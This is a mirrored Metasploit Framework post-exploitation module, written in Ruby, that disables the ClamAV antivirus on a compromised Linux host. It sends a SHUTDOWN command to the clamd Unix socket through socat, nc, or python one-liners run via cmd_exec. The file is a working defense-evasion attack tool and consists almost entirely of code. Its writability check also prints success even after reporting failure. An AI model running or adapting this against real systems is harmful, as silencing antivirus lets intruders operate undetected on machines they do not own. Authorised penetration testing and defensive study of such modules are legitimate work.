Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/manage/disable_clamav.rb
19643 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Unix

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Disable ClamAV',

15
        'Description' => %q{

16
          This module will write to the ClamAV Unix socket to shutoff ClamAV.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [

20
          'DLL_Cool_J'

21
        ],

22
        'Platform' => [ 'linux' ],

23
        'SessionTypes' => [ 'meterpreter', 'shell' ],

24
        'Notes' => {

25
          'Stability' => [SERVICE_RESOURCE_LOSS],

26
          'Reliability' => [],

27
          'SideEffects' => [IOC_IN_LOGS]

28
        }

29
      )

30
    )

31
    register_options(

32
      [

33
        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),

34
        OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])

35
      ]

36
    )

37
  end

38


39
  def run

40
    clamav_socket = datastore['CLAMAV_UNIX_SOCKET']

41
    cmd = datastore['COMMAND']

42


43
    if command_exists?('socat')

44
      print_good('socat exists')

45
      payload = "echo #{cmd} | socat - UNIX-CONNECT:#{clamav_socket}"

46
    elsif command_exists?('nc')

47
      print_good('nc exists')

48
      payload = "echo #{cmd} | nc -U #{clamav_socket}"

49
    elsif command_exists?('python')

50
      print_good('python exists')

51
      payload = "python -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""

52
    elsif command_exists?('python3')

53
      print_good('python3 exists')

54
      payload = "python3 -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""

55
    else

56
      fail_with(Failure::NotFound, 'No suitable binary found on the target host. Quitting!')

57
    end

58


59
    print_status("Checking file path #{clamav_socket} exists and is writable... ")

60
    print_bad('File does NOT exist or is not writable!') unless writable?(clamav_socket.to_s)

61
    print_good('File does exist and is writable!')

62
    print_good("Sending #{cmd}...")

63
    cmd_exec(payload)

64
  end

65
end

66


67